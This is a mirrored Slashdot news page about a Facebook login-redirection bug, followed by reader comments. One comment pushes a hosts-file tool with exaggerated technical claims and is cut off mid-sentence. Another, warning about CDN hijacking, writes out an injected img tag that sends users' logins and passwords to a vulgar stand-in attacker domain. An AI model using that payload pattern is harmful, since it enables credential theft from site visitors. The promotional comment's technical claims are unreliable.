Slashdot Mirror
Facebook Breaks Major Websites With Redirection Bug
johnsnails writes "Some of the biggest news sites in the world disappeared yesterday when Facebook took over the internet with a redirection bug. Visitors to sites such as The Washington Post, BuzzFeed, the Gawker network, NBC News and News.com.au were immediately transferred to a Facebook error page upon loading their intended site. It was fixed quickly, and Facebook provided this statement: 'For a short period of time, there was a bug that redirected people logging in with Facebook from third party sites to Facebook.com. The issue was quickly resolved, and Login with Facebook is now working as usual.'"
Especially on this note of redirection (hosts file hardcodes stop that, for one thing, ALONG WITH ADBANNERS TOO - plus custom hosts files can do 10 things listed below, adblock can't, period...):
---
APK Hosts File Engine 5.0++ 32/64-bit:
http://start64.com/index.php?option=com_content&view=article&id=5851:apk-hosts-file-engine-64bit-version&catid=26:64bit-security-software&Itemid=74
Which, if you read the list of what it can do for you as an end user of the resulting output it produces listed in the link above, you'll understand how/why...
"It's as strong as steel, & a 3rd of the weight" - Howard Stark from the film "Captain America"
---
Especially vs. competing alternate 'solutions', noted below in AdBlock/Ghostery & yes even DNS servers, next, as 'examples thereof'...
Solutions that used to be good & I even recommended them in security guides I wrote up over the decades now -> http://www.google.com/search?hl=en&tbo=d&output=search&sclient=psy-ab&q=%22HOW+TO+SECURE+Windows+2000/XP%22&btnG=Submit&gbv=1&sei=ka3yUKzxB-6_0QHLroCQCA
That did extremely well for myself (and users of them), for Windows users, for "layered-security"/"defense-in-depth" purposes - the BEST THING WE HAVE GOING vs. threats of all kinds, currently!
(Not anymore though, & certainly NOT far as AdBlock's concerned especially, not after this):
---
Adblock Plus To Offer 'Acceptable Ads' Option:
http://news.slashdot.org/story/11/12/12/2213233/adblock-plus-to-offer-acceptable-ads-option
(Meaning by default, which MOST USERS WON'T CHANGE, it doesn't block ALL ads - they "souled-out"... talk about "foxes guarding the henhouse")!
---
Plus, Adblock CAN'T DO AS MUCH & not from a single file solution that runs in Ring 0/RPL 0/kernelmode via tcpip.sys, a driver (since it's part of the IP stack & tightly integrated into it) which is far, Far, FAR FASTER than ring 3/rpl 3/usermode apps like browsers, & addons slow them down (known issue in FireFox).
To wit, 10++ things AdBlock can't do, hosts can:
---
1.) Blocking rogue DNS servers malware makers use
2.) Blocking known sites/servers that serve up malware... like known sites/servers/hosts-domains that serve up malicious scripts
3.) Speeding up your FAVORITE SITES that hosts can speed up via hardcoded line item entries properly resolved by a reverse DNS ping
4.) AdBlock works on Mozilla products (browser & email), hosts work on ANY webbound app AND are multiplatform.
5.) AdBlock can't protect external to FireFox email programs, hosts can (think OUTLOOK, Eudora, & others)
6.) AdBlock can't help you blow past DNSBL's (DNS block lists)
7.) AdBlock can't help you avoid DNS request logs (hosts can via hardcoded favorites)
8.) AdBlock can't protect you vs. TRACKERS (hosts can)
9.) AdBlock can't protect you vs. DOWNED or "DNS-poisoned" redirected DNS servers (hosts can by hardcodes)
10.) Hosts are EASIER to manage, they're just a text file (adblock means you had BEST know your javascript, perl, & python (iirc as to what languages are used to make it from source)).
& more... as a tiny 'sampling' & proofs thereof!
---
Same with Ghostery:
---
Evidon, which makes Ghostery, is an advertising company.
They were originally named Better Advertising, Inc., but changed their name for obvious
I shudder thinking what havoc you could cause if you'd manage to hijack one of big JS library CDNs.
For example, just imagine every copy of jQuery from Google's CDN also including instructions to add '<img src="http://buttfuck.me/lol?domain=$window.domain&login=$login&pass=$pass">' on clicking login button - even if it'd be up for just a few minutes, you'd still probably get millions of user accounts sent to you.
Economical impact would be huge, with thousands of sites scouring logs and resetting compromised logins and users having to check and reset every password.
Only a tiny minority is uses NoScript, and then some sites require scripts to function - so you should also use some tricks to replace them with locally cached versions. I really hope those CDN servers are in secure location with write access only for verified personnel physically present on site.